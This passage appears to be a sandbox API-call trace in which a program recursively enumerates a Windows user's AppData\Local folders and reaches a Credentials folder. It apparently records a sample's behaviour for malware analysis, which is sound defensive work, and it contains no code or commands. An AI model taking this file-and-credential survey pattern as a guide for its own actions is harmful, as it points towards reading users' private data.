lpFilePart=0x0) returned 0x29 [0266.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f134) returned 1 [0266.842] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", nBufferLength=0x105, lpBuffer=0x19ec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", lpFilePart=0x0) returned 0x29 [0266.842] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", nBufferLength=0x105, lpBuffer=0x19ec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", lpFilePart=0x0) returned 0x2a [0266.842] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\*"), lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.842] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.842] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x50cde571, ftLastAccessTime.dwHighDateTime=0x1d8596d, ftLastWriteTime.dwLowDateTime=0x50cde571, ftLastWriteTime.dwHighDateTime=0x1d8596d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0266.842] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Unistore", cAlternateFileName="")) returned 1 [0266.842] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa2fb89cf, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xa2fb89cf, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 1 [0266.842] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.842] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f4) returned 1 [0266.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f100) returned 1 [0266.843] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", lpFilePart=0x0) returned 0x2e [0266.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.843] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", lpFilePart=0x0) returned 0x2e [0266.843] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\", lpFilePart=0x0) returned 0x2f [0266.843] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xcd257a12, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xcd257a12, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x693090 [0266.844] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xcd257a12, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xcd257a12, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.844] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b315521, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xcd257a12, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xcd258e10, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="CalendarCache.dat", cAlternateFileName="CALEND~1.DAT")) returned 1 [0266.844] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.844] FindClose (in: hFindFile=0x693090 | out: hFindFile=0x693090) returned 1 [0266.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.844] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", lpFilePart=0x0) returned 0x2e [0266.844] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore", lpFilePart=0x0) returned 0x32 [0266.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.844] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore", lpFilePart=0x0) returned 0x32 [0266.845] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\", lpFilePart=0x0) returned 0x33 [0266.845] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\unistore\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6935d0 [0266.845] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.845] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0266.845] FindClose (in: hFindFile=0x6935d0 | out: hFindFile=0x6935d0) returned 1 [0266.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.846] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Unistore", lpFilePart=0x0) returned 0x32 [0266.846] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB", lpFilePart=0x0) returned 0x34 [0266.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.846] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB", lpFilePart=0x0) returned 0x34 [0266.846] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\", lpFilePart=0x0) returned 0x35 [0266.846] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\unistoredb\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa2fb89cf, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xa2fb89cf, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.847] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa2fb89cf, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xa2fb89cf, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.847] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23a0d188, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23a0d188, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xa2f9c953, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x600000, dwReserved0=0x0, dwReserved1=0x0, cFileName="store.vol", cAlternateFileName="")) returned 1 [0266.847] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2fb89cf, ftCreationTime.dwHighDateTime=0x1d8598c, ftLastAccessTime.dwLowDateTime=0xa2fb89cf, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xa3078682, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmp.edb", cAlternateFileName="")) returned 1 [0266.847] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239e71ab, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239e71ab, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xa2f60b3e, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USS.chk", cAlternateFileName="")) returned 1 [0266.847] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2399ab8b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2399ab8b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xa2f61fce, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USS.log", cAlternateFileName="")) returned 1 [0266.847] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239c0dc2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239c0dc2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239c0dc2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USSres00001.jrs", cAlternateFileName="USSRES~1.JRS")) returned 1 [0266.848] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239c0dc2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239c0dc2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239c0dc2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USSres00002.jrs", cAlternateFileName="USSRES~2.JRS")) returned 1 [0266.848] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2399ab8b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2399ab8b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xdd289e64, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x0, dwReserved1=0x0, cFileName="USStmp.log", cAlternateFileName="")) returned 1 [0266.848] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.848] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.848] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB", lpFilePart=0x0) returned 0x34 [0266.848] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History", lpFilePart=0x0) returned 0x2b [0266.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b8) returned 1 [0266.849] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History", nBufferLength=0x105, lpBuffer=0x19ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History", lpFilePart=0x0) returned 0x2b [0266.849] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History\\", nBufferLength=0x105, lpBuffer=0x19ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History\\", lpFilePart=0x0) returned 0x2c [0266.849] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\history\\*"), lpFindFileData=0x19eee0 | out: lpFindFileData=0x19eee0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0266.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f17c) returned 1 [0266.851] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2d [0266.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1b8) returned 1 [0266.851] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x19ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2d [0266.851] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\", nBufferLength=0x105, lpBuffer=0x19ec94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\", lpFilePart=0x0) returned 0x2e [0266.851] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\*"), lpFindFileData=0x19eee0 | out: lpFindFileData=0x19eee0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x693750 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLR_v4.0", cAlternateFileName="")) returned 1 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLR_v4.0_32", cAlternateFileName="CLR_V4~1.0_3")) returned 1 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe3af070a, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3af070a, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x430ec4ba, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe3b0c8ff, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3b0c8ff, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a17d745, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a184b86, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a184b86, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FORMS", cAlternateFileName="")) returned 1 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x809248a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xc7db342, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc7db342, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GameDVR", cAlternateFileName="")) returned 1 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, 